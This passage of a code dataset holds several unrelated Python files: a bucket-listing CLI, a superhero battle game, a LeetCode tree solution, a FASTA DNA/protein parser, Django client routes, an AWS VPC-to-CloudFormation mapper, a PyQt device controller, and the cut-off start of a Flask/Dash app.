buckets.\"\"\"\n buckets = config['project']['endpoints'][endpoint].get('buckets', {})\n\n if buckets is None:\n raise click.ClickException('No registered buckets')\n\n for bucket_id, name in buckets.items():\n click.echo('{0}\\t{1}'.format(name, bucket_id))\n","sub_path":"renga/cli/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"187055239","text":"from SuperPoder import SuperPoder\r\nfrom Personagem import Personagem\r\nfrom SuperHeroi import SuperHeroi\r\nfrom Vilao import Vilao\r\nfrom Confronto import Confronto\r\n\r\n# ----------------------------------- criando superpoderes ----------------------------------------\r\n# Mario\r\nflorDeFogo = SuperPoder(\"Flor de fogo\", 3)\r\nplumaMagica = SuperPoder(\"Pluma Mágica\", 4)\r\nflorDeGelo = SuperPoder(\"Flor de gelo\", 3)\r\ncogumelo = SuperPoder(\"Cogumelo\", 2)\r\nestrela = SuperPoder(\"Estrela\", 5)\r\n\r\n# Homem Aranha\r\nsoltarTeia = SuperPoder(\"Soltar teia\", 3)\r\nandarEmParedes = SuperPoder(\"Andar em paredes\", 2)\r\nsentidoAranha = SuperPoder(\"Sentido aranha\", 1)\r\n\r\n# Super Homem\r\nvoar = SuperPoder(\"voar\", 3)\r\nforca = SuperPoder(\"forca\", 5)\r\nraioX = SuperPoder(\"raioX\", 4)\r\nsoproCongelante = SuperPoder(\"soproCongelante\", 4)\r\n\r\n#Capitão América\r\nsuperSoldado = SuperPoder(\"Super Soldado\", 3)\r\nescudo = SuperPoder(\"Escudo\", 5)\r\n\r\n# Flash\r\nvelocidade = SuperPoder(\"Velocidade\", 5)\r\n\r\n# Lanterna Verde\r\nanelMagico = SuperPoder(\"Anel Mágico\", 5)\r\n\r\n# Homem de Ferro\r\narmadura = SuperPoder(\"Armadura\", 4)\r\ndispositivosEletronicos = SuperPoder(\"Dispositivos eletrônicos\", 2)\r\n\r\n# Lex Luthor\r\nmenteAgucada = SuperPoder(\"Mente aguçada\", 5)\r\n\r\n# Octopus\r\ntentaculos = SuperPoder(\"Tentáculos indestrutíveis\", 5)\r\npocaVelocidade = SuperPoder(\"Velocidade\", 1)\r\n\r\n# ---------------------------- criando superHerois --------------------------------\r\n# Homem Aranha\r\nhomemAranha = SuperHeroi(\"Homem Aranha\", \"Peter 
Parker\")\r\nhomemAranha.adicionaSuperPoder(soltarTeia)\r\nhomemAranha.adicionaSuperPoder(andarEmParedes)\r\nhomemAranha.adicionaSuperPoder(sentidoAranha)\r\n\r\n# Super Homem\r\nsuperHomem = SuperHeroi(\"Super Homem\", \"Clark Kent\")\r\nsuperHomem.adicionaSuperPoder(voar)\r\nsuperHomem.adicionaSuperPoder(forca)\r\nsuperHomem.adicionaSuperPoder(raioX)\r\nsuperHomem.adicionaSuperPoder(soproCongelante)\r\n\r\n# Capitão América\r\ncapitaoAmerica = SuperHeroi(\"Capitão América\", \"Steven Rogers\")\r\ncapitaoAmerica.adicionaSuperPoder(superSoldado)\r\ncapitaoAmerica.adicionaSuperPoder(escudo)\r\n\r\n# Flash \r\nflash = SuperHeroi(\"Flash\", \"Barry Allen\")\r\nflash.adicionaSuperPoder(forca)\r\n\r\n# Lanterna Verde\r\nlanternaVerde = SuperHeroi(\"Lanterna Verde\", \"Hal Jordan\")\r\nlanternaVerde.adicionaSuperPoder(anelMagico)\r\n\r\n# Homem de Ferro\r\nhomemDeFerro = SuperHeroi(\"Homem de Ferro\", \"Tony Stark\")\r\nhomemDeFerro.adicionaSuperPoder(armadura)\r\nhomemDeFerro.adicionaSuperPoder(dispositivosEletronicos)\r\n\r\n# ----------------------------- criando vilões -----------------------------------\r\n# Duende Verde\r\nduendeVerde = Vilao(\"Duende Verde\", \"Norman Osbourne\", 15)\r\nduendeVerde.adicionaSuperPoder(forca)\r\n\r\n# Lex Luthor\r\nlexLuthor = Vilao(\"Lex Luthor\", \"Lex Luthor\", 10)\r\nlexLuthor.adicionaSuperPoder(menteAgucada)\r\n\r\n# Bizarro\r\nbizarro = Vilao(\"Bizarro\", \"Bizarro\", 20)\r\nbizarro.adicionaSuperPoder(voar)\r\nbizarro.adicionaSuperPoder(forca)\r\nbizarro.adicionaSuperPoder(raioX)\r\nbizarro.adicionaSuperPoder(soproCongelante)\r\n\r\n# Octopus\r\noctopus = Vilao(\"Octopus\", \"Otto Octavius\", 22)\r\noctopus.adicionaSuperPoder(tentaculos)\r\noctopus.adicionaSuperPoder(pocaVelocidade)\r\n\r\n# --------------------------------- testando -------------------------------------\r\n\r\n# cria lista de herois e vilões para exibi-los no console\r\nherois = [homemAranha, capitaoAmerica, superHomem, flash, lanternaVerde, homemDeFerro]\r\nviloes = [duendeVerde, lexLuthor, bizarro, octopus]\r\n\r\n# exibe os heróis da lista\r\ndef mostraHerois():\r\n\t\tprint (\"Heróis:\")\r\n\t\tfor heroi in herois:\r\n\t\t\t\tprint(heroi.getNome() + \", poder: \" + str(heroi.getPoderTotal()))\r\n\r\n# exibe os vilões da lista\r\ndef mostraViloes():\r\n\t\tprint (\"Vilões:\")\r\n\t\tfor vilao in viloes:\r\n\t\t\t\tprint(vilao.getNome() + \", poder: \" + str(vilao.getPoderTotal()) + \", Tempo de prisão: \" + str(vilao.getAnosDePrisao()) + \" anos.\")\r\n\r\n# iniciam-se os confrontos\r\nconfronto = Confronto()\r\nprint (confronto.executarConfronto(homemAranha, octopus))\r\nprint (confronto.executarConfronto(superHomem, bizarro))\r\nprint (confronto.executarConfronto(homemDeFerro, bizarro))\r\n","sub_path":"Jogo.py","file_name":"Jogo.py","file_ext":"py","file_size_in_byte":4039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"566581489","text":"# https://leetcode.com/problems/sum-of-root-to-leaf-binary-numbers/\n# ---------------------------------------------------\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left = self.right = None\n\n\n# Runtime Complexity: O(N)\n# Space Complexity: O(max_depth), which is O(N) in worst case(skewed Tree) or O(max_depth) in case of balanced tree.\nclass Solution:\n def sumRootToLeaf(self, node: TreeNode) -> int:\n if not node:\n return 0\n\n stack = deque()\n stack.append((node, node.val))\n\n total_sum = 0\n\n while stack:\n node, cur_sum = stack.pop()\n\n if not 
node.left and not node.right:\n                total_sum += cur_sum\n\n            if node.left:\n                stack.append((node.left, cur_sum * 2 + node.left.val))\n\n            if node.right:\n                stack.append((node.right, cur_sum * 2 + node.right.val))\n\n\n        return total_sum\n\n# ---------------------------------------------------\n# Uses DN functions:\n# ---------------------------------------------------\nfrom collections import deque\n\n\ndef createBinaryTreeFromArray(arr):\n    if arr is None or len(arr) == 0:\n        return None\n\n    root_node = TreeNode(arr[0])\n    q = deque()\n    q.append(root_node)\n\n    i = 1\n    while q and i < len(arr):\n        node = q.popleft()\n\n        if node:\n            if arr[i] is not None:\n                node.left = TreeNode(arr[i])\n                q.append(node.left)\n            i += 1\n\n            if i < len(arr) and arr[i] is not None:\n                node.right = TreeNode(arr[i])\n                q.append(node.right)\n                i += 1\n\n    return root_node\n\n\n# ---------------------------------------------------\n# Test Cases\n# ---------------------------------------------------\nsolution = Solution()\nprint(solution.sumRootToLeaf(createBinaryTreeFromArray([1, 0, 1, 0, 1, 0, 1])))\nprint(solution.sumRootToLeaf(createBinaryTreeFromArray([1, None, 0])))\n","sub_path":"topics/Tree/Sum_of_Root_To_Leaf_Binary_Numbers_1022/[Iterative_DFS_stack_with_tuple]_Sum_of_Root_To_Leaf_Binary_Numbers_1022.py","file_name":"[Iterative_DFS_stack_with_tuple]_Sum_of_Root_To_Leaf_Binary_Numbers_1022.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"79704635","text":"# Robert Bennett - rbennet8@uncc.edu - 2/12/2020\n\n# Sequence - Should hold sequence of each object and a method to print them\n# DNASequence - Holds methods to transcribe (moved from the Sequence class) and translate\n    # Can only contain the characters A, T, C, and G\n# ProteinSequence - Holds method to display structure\n    # Can only contain the characters M, F, L, C, Y, W, P, H, Q, R, I, T, N, K, S, V, A, D, E, G, AND *\n\n\n#ENTER PATHS TO FASTA SEQUENCES AT THE LINES CONTAINING ################################################################\n\n\n\n# Parent class to DNA and Protein sequences\nclass Sequence:\n    def __init__(self, seq):\n        self.seq = seq\n\n    def __repr__(self):\n        return self.seq\n\n\n\n# Child class of Sequence and stores the nucleotide sequence\n# Also has methods to transcribe and translate the sequence to a protein\nclass DNASequence(Sequence):\n    def __init__(self, seq):\n        # If secondary sequence check passes, then the constructor calls the super class to create the object\n        if self.seqCheck(seq):\n            super().__init__(seq)\n        # Else, an error is raised, which prevents an invalid object from being created\n        else:\n            raise ValueError(\"Invalid DNA sequence\")\n\n    # Second check to make sure whatever is being passed is a DNA sequence, in case it isn't submitted via parse method\n    def seqCheck(self, seq):\n        # Checks that every character in seq is one of A, T, C or G and returns boolean\n        valid = all(x in \"ATCG\" for x in seq)\n        return valid\n\n    # Method that replaces every T in the string with a U and returns string\n    # Method from previous lab\n    def transcribe(self):\n        mrna = self.seq.replace('T', 'U')\n        return mrna\n\n    # Method that takes transcribed sequence and translates it, then saves the sequence as a protein object\n    def translate(self):\n        aa_dict = {'M': ['ATG'],\n                   'F': ['TTT', 'TTC'],\n                   'L': ['TTA', 'TTG', 'CTT', 'CTC', 'CTA', 'CTG'],\n                   'C': ['TGT', 'TGC'],\n                   'Y': ['TAC', 'TAT'],\n                   'W': ['TGG'],\n                   'P': ['CCT', 'CCC', 'CCA', 'CCG'],\n                   'H': ['CAT', 'CAC'],\n                   'Q': ['CAA', 
'CAG'],\n                   'R': ['CGT', 'CGC', 'CGA', 'CGG', 'AGA', 'AGG'],\n                   'I': ['ATT', 'ATC', 'ATA'],\n                   'T': ['ACT', 'ACC', 'ACA', 'ACG'],\n                   'N': ['AAT', 'AAC'],\n                   'K': ['AAA', 'AAG'],\n                   'S': ['AGT', 'AGC', 'TCT', 'TCC', 'TCA', 'TCG'],\n                   'V': ['GTT', 'GTC', 'GTA', 'GTG'],\n                   'A': ['GCT', 'GCC', 'GCA', 'GCG'],\n                   'D': ['GAT', 'GAC'],\n                   'E': ['GAA', 'GAG'],\n                   'G': ['GGT', 'GGC', 'GGA', 'GGG'],\n                   '*': ['TAA', 'TAG', 'TGA']}\n\n        # Declaring variables used for while loop, triplet selection, and protein sequence\n        x = 0\n        y = 3\n        protein = \"\"\n        # While the last triplet position is less than the length of the sequence, continue; prevents while loop from searching\n        # for bases in an out of bounds index\n        while y < len(self.seq):\n            # Setting the triplet at the beginning of each loop\n            triplet = self.seq[x:y]\n            # For the key and value in amino acid dictionary, if triplet matches the value, append key to protein sequence\n            for key, val in aa_dict.items():\n                if triplet in val:\n                    protein += key\n            # Incrementing for triplets\n            x += 3\n            y += 3\n        # Returns protein object\n        return ProteinSequence(protein)\n\n\n\n# Child class of Sequence and stores the protein translation of the sequence\nclass ProteinSequence(Sequence):\n    def __init__(self, seq):\n        # If secondary sequence check passes, then the constructor calls the super class to create the object\n        if self.seqCheck(seq):\n            super().__init__(seq)\n        # Else, an error is raised, which prevents an invalid object from being created\n        else:\n            raise ValueError(\"Invalid protein sequence\")\n\n    # Second check to make sure whatever is being passed is a protein sequence, in case it isn't submitted via parse method\n    def seqCheck(self, seq):\n        # Checks that every character in seq is one of MFLCYWPHQRITNKSVADEG* and returns boolean\n        valid = all(x in \"MFLCYWPHQRITNKSVADEG*\" for x in seq)\n        return valid\n\n    # This method would search protein databases for similar sequences and return the structure of the closest match\n    def displayStructure(self):\n        pass\n\n\n# Takes in a \"label\", which is the name of the sequence, and a sequence object, where the sequence is stored.\nclass SequenceRecord:\n    def __init__(self, label, seqObj):\n        # Checking to make sure a Sequence object is being passed, by making sure it is an instance of the parent class Sequence,\n        # then storing the value\n        if isinstance(seqObj, Sequence):\n            self.seqObj = seqObj\n            self.label = label\n        else:\n            raise TypeError(\"seqObj must be a Sequence instance\")\n\n    # Method to return an output for the class\n    def __repr__(self):\n        return self.label + \"\\n\" + self.seqObj.seq\n\n\n\n# Function that takes in a FASTA file and separates information into separate variables\ndef parse(path):\n    label = None\n    seq = \"\"\n    file = open(path)\n    # For loop that increments through each line of the FASTA file\n    for line in file:\n        # Handles line that begins with >\n        if line.startswith(\">\"):\n            if label:\n                # Checking sequence and handling it accordingly; if 1, create DNA object; if 2, create Protein object\n                if checkSeq(seq) == 1:\n                    seqRecord = SequenceRecord(label, DNASequence(seq))\n                    yield seqRecord\n                elif checkSeq(seq) == 2:\n                    seqRecord = SequenceRecord(label, ProteinSequence(seq))\n                    yield seqRecord\n                label = None\n                seq = \"\"\n            label = line.rstrip().lstrip(\">\")\n        # If no > then concats line to sequence\n        else:\n            seq += line.rstrip()\n    # Checking sequence and handling it accordingly; if 1, create DNA object; if 2, create Protein object\n    if checkSeq(seq) == 1:\n        seqRecord = SequenceRecord(label, DNASequence(seq))\n        yield (seqRecord)\n    elif checkSeq(seq) == 2:\n        seqRecord = 
SequenceRecord(label, ProteinSequence(seq))\n        yield seqRecord\n\n# Checks sequence to see if it's protein or DNA, then returns an int or boolean\ndef checkSeq(sequence):\n    # If every character is a valid DNA base, return 1 (DNA is checked first since its alphabet is a subset of the protein alphabet)\n    if all(x in \"ATCG\" for x in sequence):\n        return 1\n    # If every character is a valid amino acid (or a * stop), return 2\n    elif all(x in \"MFLCYWPHQRITNKSVADEG*\" for x in sequence):\n        return 2\n    # If sequence is neither, return boolean and break program to prevent it from continuing\n    else:\n        return False\n\n# Takes in path for FASTA file and passes it to parse method\npath = r'DNA FASTA PATH' ###############################################################################################\ntert = []\nfor seq in parse(path):\n    tert.append(seq)\n# Prints out information before and after calling transcription method\nprint(\"Printing name and sequence of DNA FASTA:\\n\", tert[0], \"\\n\")\n\n# Calling transcribe method and printing the result\nrna = tert[0].seqObj.transcribe()\nprint(\"Printing mRNA sequence:\\n\", rna, \"\\n\")\n\n# Prints just the sequence of the obj in the sequence record\nprint(\"Printing just the sequence from the Parent Sequence class:\\n\", tert[0].seqObj, \"\\n\")\n\n# Creating protein variable to hold the object being returned from translate method in DNASequence class and printing it\nprotein = tert[0].seqObj.translate()\nprint(\"Printing the translation of DNA sequence:\\n\", protein, \"\\n\")\n\n# Taking in another path, this time to a protein FASTA, and outputting the information; making sure the program can handle\n# both types of FASTA files\npath2 = r'PROTEIN FASTA PATH' ##########################################################################################\ntertP = []\nfor seq in parse(path2):\n    tertP.append(seq)\nprint(\"Printing name and sequence of Protein FASTA:\\n\", tertP[0])","sub_path":"Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":8273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"442294225","text":"from django.urls import path\r\nfrom . 
import views\n\nurlpatterns = [\n path(\"installer//sites/\", views.installer_list_sites),\n path(\"listclients/\", views.list_clients),\n path(\"installer/listclients/\", views.installer_list_clients),\n path(\"addclient/\", views.add_client),\n path(\"addsite/\", views.add_site),\n path(\"loadtree/\", views.load_tree),\n path(\"loadclients/\", views.load_clients),\n path(\"initialsetup/\", views.initial_setup),\n]\n","sub_path":"api/tacticalrmm/clients/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"353135330","text":"# -*- coding:utf-8 -*-\n\nimport boto\nimport boto.ec2\nimport boto.vpc\nimport argparse\n\nfrom models import *\n\nclass CloudFormer:\n def __init__(self, access_key, secret_key, vpc_id, region_name='us-east-1'):\n self.access_key = access_key if access_key is not None else ''\n self.secret_key = secret_key if secret_key is not None else ''\n self.region = boto.ec2.get_region(\n region_name,\n aws_access_key_id=self.access_key,\n aws_secret_access_key=self.secret_key\n )\n self.vpc_id = vpc_id\n self.vpc_filter = ('vpc-id', vpc_id)\n self.vpc_attachment_filter = ('attachment.vpc-id', vpc_id)\n\n def form(self):\n self.vpcconn = boto.connect_vpc(\n region=self.region,\n aws_access_key_id=self.access_key,\n aws_secret_access_key=self.secret_key\n )\n context = {}\n self._form_vpc(context)\n self._form_internet_gateway(context)\n self._form_gateway_attachments(context)\n self._form_subnets(context)\n self._form_route_tables(context)\n self._form_instances(context)\n self._form_route(context)\n self._form_subnet_route_table_association(context)\n return context\n\n def _form_vpc(self, context):\n vpcs = self.vpcconn.get_all_vpcs(filters=[self.vpc_filter])\n context['vpc'] = CfnVpc(vpcs[0])\n\n def _form_internet_gateway(self, context):\n context['internet_gateways'] = [CfnInternetGateWay(igw) for igw\n in self.vpcconn.get_all_internet_gateways(\n filters=[self.vpc_attachment_filter]\n )]\n\n def _form_gateway_attachments(self, context):\n internet_gateways = context['internet_gateways']\n attachments = []\n for internet_gateway in internet_gateways:\n attachments.extend([CfnVpcGatewayAttachment(att, internet_gateway) for att in internet_gateway.attachments])\n context['gateway_attachments'] = attachments\n\n def _form_subnets(self, context):\n context['subnets'] = [CfnSubnet(s) for s\n in self.vpcconn.get_all_subnets(\n filters=[self.vpc_filter]\n )]\n\n def _form_route_tables(self, context):\n context['route_tables'] = [CfnRouteTable(rtb) for rtb\n in self.vpcconn.get_all_route_tables(\n filters=[self.vpc_filter]\n )]\n\n def _form_instances(self, context):\n instances = []\n for reservation in self.vpcconn.get_all_instances(filters={'vpc-id': self.vpc_id}):\n for instance in reservation.instances:\n instances.append(CfnEC2Instance(instance))\n context['instances'] = instances\n\n def _form_route(self, context):\n route_tables = context['route_tables']\n routes = []\n for route_table in route_tables:\n routes.extend([CfnRoute(route, route_table) for route in route_table.routes])\n context['routes'] = routes\n\n def _form_subnet_route_table_association(self, context):\n route_tables = context['route_tables']\n associations = []\n for route_table in route_tables:\n associations.extend([CfnSubnetRouteTableAssociation(assoc) for assoc in route_table.associations])\n context['subnet_route_table_associations'] = 
associations\n\n","sub_path":"lib/floccus/former.py","file_name":"former.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"91046151","text":"import os\nfrom datetime import datetime\nfrom PyQt5 import QtCore\nfrom Driver.STM_Interface import STM_Interface\nfrom Driver.IO_Plots import IO_Plots\nfrom Driver.FSM import State, Transition, FSM\nfrom Driver.Actions import List_Actions, Action, No_Action\nfrom Driver.Conditions import Condition, Condition_Empty, Cond_SA_Ready, Cond_SA_Operation, Cond_UniqueTransition\n\nclass ListControllers(object):\n\tdef __init__(self):\n\t\tself.Controllers = {}\n\n\tdef addController(self, controller):\n\t\tself.Controllers[controller.name] = controller\n\n\tdef isBusy(self):\n\t\tfor i in self.Controllers.keys():\n\t\t\tif self.Controllers[i].ControllerBusy == True:\n\t\t\t\treturn True\n\t\treturn False\n\t\t\n\tdef FinishAllActions(self):\n\t\t# To be done\n\t\tpass\n\nclass Controller(object):\n\tdef __init__(self, name, Interface, Timeout=10):\n\n\t\t#########################################\n\t\t# EACH CONTROLLER INCLUDES AT LEAST:\t#\n\t\t# - A list of actions\t\t\t#\n\t\t# - An FSM with:\t\t\t#\n\t\t# \t-> States [Action + Condition]\t#\n\t\t#\t-> Transition [Action]\t\t#\n\t\t# - A timer that ticks the FSM\t\t#\n\t\t# - A pointer to the STM Interface\t#\n\t\t#########################################\n\t\tself.name = name\n\t\tself.FSM = FSM(self)\n\t\tself.Plots = IO_Plots()\n\t\tself.Timer = QtCore.QTimer()\n\t\tself.Timer.timeout.connect(self.FSM.Execute)\n\t\tself.Timeout = Timeout\n\t\tself.Interface = Interface\t\n\n\t\t#########################\n\t\t# Actions Definitions\t#\n\t\t#########################\n\t\tself.Actions = List_Actions(self)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"RequestFrame\", 6)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"CharactCurves\", 7)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"CalibArray\", 8)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"LAMP\", 10)\n\t\tself.Actions.Create_Action(\"STM\", \"RefTemp\", \"PCR\", 11)\n\t\tself.Actions.Create_Action(\"STM\", \"RefTemp\", \"TempControl\", 12, 95.0)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"TempCharact\", 13)\n\t\tself.Actions.Create_Action(\"STM\", \"RefTemp\", \"TempRefMeas\", 14)\n\t\tself.Actions.Create_Action(\"STM\", \"Pixel\", \"TempNoise\", 15)\n\t\tself.Actions.Create_Action(\"STM\", \"RefTemp\", \"TempCoilCharact\", 16)\n\t\tself.Actions.Create_Action(\"STM\", \"RefTemp\", \"TempCoilDynamics\", 17)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"WaveGen\", 18)\n\t\tself.Actions.Create_Action(\"STM\", \"Pixel\", \"ChemNoise\", 19)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"MultipleFrames\", 20, 10.0)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"SampleFor10Minutes\", 21, 10.0)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"DACSensitivityTest\", 22)\n\t\tself.No_Action = No_Action()\n\n\t\tself.ControllerBusy = False\n\t\tself.InterruptEnable = False\n\t\tself.InterruptAction = None\n\t\tself.InterruptReady = False\n\n\tdef LaunchController(self, cargo, Plot_3D, Plot_2D, Text = None):\n\t\tself.ControllerBusy = True\n\t\tself.Timer.start(self.Timeout)\n\t\tself.DefinePlots(Plot_3D, Plot_2D)\n\t\tif Text != None:\n\t\t\tself.DefineTextBox(Text)\n\n\tdef StopController(self):\n\t\tself.Timer.stop()\n\t\tself.ControllerBusy = False\n\n\tdef DefinePlots(self, Plot_3D, 
Plot_2D):\n\t\tself.Plots.SetupPlots(Plot_3D, Plot_2D)\n\n\tdef DefineTextBox(self, Text):\n\t\tself.Plots.SetupText(Text)\n\n\tdef EnableInterrupt(self, Action):\n\t\tself.InterruptEnable = True\n\n\tdef DisableInterrupt(self):\n\t\tself.InterruptEnable = False\n\n\tdef DataTransferBetweenStates(self, StateName_Sender, StateName_Receiver):\n\t\tself.FSM.states[StateName_Receiver].Action.action_data = self.FSM.states[StateName_Sender].Action.action_data\t\n\nclass debug_Controller(Controller):\n\tdef __init__(self, name, Interface, Timeout=10):\n\n\t\tself.SavePath = \"Results/Debug\"\n\t\tif not os.path.exists(self.SavePath):\n\t\t\tos.makedirs(self.SavePath)\n\t\tsuper(debug_Controller, self).__init__(name,Interface,Timeout)\n\n\t\tself.FSM.AddState(\"Ready\",self.No_Action, Cond_SA_Ready())\n\t\tself.FSM.AddState(\"Single_RequestFrame\",self.Actions.Assing(\"RequestFrame\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_CharactCurves\",self.Actions.Assing(\"CharactCurves\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_CalibArray\", self.Actions.Assing(\"CalibArray\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_LAMP\", self.Actions.Assing(\"LAMP\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_PCR\", self.Actions.Assing(\"PCR\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_TempControl\", self.Actions.Assing(\"TempControl\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_TempCharact\", self.Actions.Assing(\"TempCharact\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_ObtainRefTemp\", self.Actions.Assing(\"TempRefMeas\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_TempNoise\", self.Actions.Assing(\"TempNoise\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_TempCoilCharact\", self.Actions.Assing(\"TempCoilCharact\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_TempCoilDynamics\", self.Actions.Assing(\"TempCoilDynamics\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_WaveGen\", self.Actions.Assing(\"WaveGen\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_ChemNoise\", self.Actions.Assing(\"ChemNoise\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_MultipleFrames\", self.Actions.Assing(\"MultipleFrames\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_SampleFor10Minutes\", self.Actions.Assing(\"SampleFor10Minutes\"), Cond_SA_Operation())\t\t\n\t\tself.FSM.AddState(\"Done\", self.No_Action, 
Condition_Empty())\n\t\tself.FSM.SetState(\"Done\")\n\t\t\n\t\tself.FSM.AddTransition(\"toRequestFrame\",Transition(\"Single_RequestFrame\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toCharactCurves\",Transition(\"Single_CharactCurves\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toCalibArray\",Transition(\"Single_CalibArray\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toLAMP\",Transition(\"Single_LAMP\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toPCR\",Transition(\"Single_PCR\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toTempControl\",Transition(\"Single_TempControl\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toTempCharact\",Transition(\"Single_TempCharact\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toObtainRefTemp\",Transition(\"Single_ObtainRefTemp\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toTempNoise\",Transition(\"Single_TempNoise\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toTempCoilCharact\",Transition(\"Single_TempCoilCharact\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toTempCoilDynamics\",Transition(\"Single_TempCoilDynamics\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toWaveGen\",Transition(\"Single_WaveGen\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toChemNoise\",Transition(\"Single_ChemNoise\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toMultipleFrames\",Transition(\"Single_MultipleFrames\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toSampleFor10Minutes\",Transition(\"Single_SampleFor10Minutes\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toDone\",Transition(\"Done\",self.StopController))\t\t\n\n\tdef LaunchController(self, cargo, Plot_3D, Plot_2D, Text = None):\n\t\tself.StartTime = datetime.now()\n\t\tself.SavePath = \"Results/Debug/\" + self.StartTime.strftime(\"%Y-%d-%b_%H-%M-%S\")\n\t\tif not os.path.exists(self.SavePath):\n\t\t\tos.makedirs(self.SavePath)\n\n\t\tself.FSM.SetSavePath(self.SavePath)\n\t\tself.FSM.SetCargo(cargo)\n\t\tself.FSM.SetState(\"Ready\")\n\t\tsuper(debug_Controller, self).LaunchController(cargo, Plot_3D, Plot_2D, Text = Text)\n\nclass DriftAnalysis_Controller(Controller):\n\tdef __init__(self, name, Interface, Timeout=10):\n\t\t\n\t\tself.SavePath = \"Results/Drift\"\n\t\tif not os.path.exists(self.SavePath):\n\t\t\tos.makedirs(self.SavePath)\n\t\tsuper(DriftAnalysis_Controller, self).__init__(name,Interface,Timeout)\n\n\t\t## STATES ##\n\t\tself.FSM.AddState(\"Ready\",self.No_Action, Cond_UniqueTransition(\"InitialCalibration\"))\n\t\tself.FSM.AddState(\"InitialCalibration\", self.Actions.Assing(\"CalibArray\"), Cond_UniqueTransition(\"DACSensitivity\"))\n\t\tself.FSM.AddState(\"DACSensitivity\", self.Actions.Assing(\"DACSensitivityTest\"), Cond_UniqueTransition(\"InitialDriftSampling\"))\n\t\tself.FSM.AddState(\"InitialDriftSampling\", self.Actions.Assing(\"SampleFor10Minutes\"), Cond_UniqueTransition(\"Done\"))\n\t\tself.FSM.AddState(\"Done\", self.No_Action, Condition_Empty())\n\t\tself.FSM.SetState(\"Done\")\n\n\t\t## TRANSITIONS 
##\n\t\tself.FSM.AddTransition(\"toInitialCalibration\",Transition(\"InitialCalibration\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toDACSensitivity\",Transition(\"DACSensitivity\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toInitialDriftSampling\",Transition(\"InitialDriftSampling\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toDone\",Transition(\"Done\",self.StopController))\t\t\n\n\tdef LaunchController(self, cargo, Plot_3D, Plot_2D, Text = None):\n\t\tself.StartTime = datetime.now()\n\t\tself.SavePath = \"Results/Drift/\" + self.StartTime.strftime(\"%Y-%d-%b_%H-%M-%S\")\n\t\tif not os.path.exists(self.SavePath):\n\t\t\tos.makedirs(self.SavePath)\n\n\t\tself.FSM.SetSavePath(self.SavePath)\n\t\tself.FSM.SetCargo(cargo)\n\t\tself.FSM.SetState(\"Ready\")\n\n\t\tsuper(DriftAnalysis_Controller, self).LaunchController(cargo, Plot_3D, Plot_2D, Text = None)\n","sub_path":"instantDNA_GUI-v1.0/Driver/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":9011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"97417289","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom flask import Flask, render_template\r\nfrom flask_httpauth import HTTPBasicAuth\r\nfrom flask_bootstrap import Bootstrap\r\n\r\nimport dash\r\nimport dash_auth\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\n\r\nimport datetime\r\nimport os\r\nimport modules.MakeGantt as mg\r\nimport plotly.figure_factory 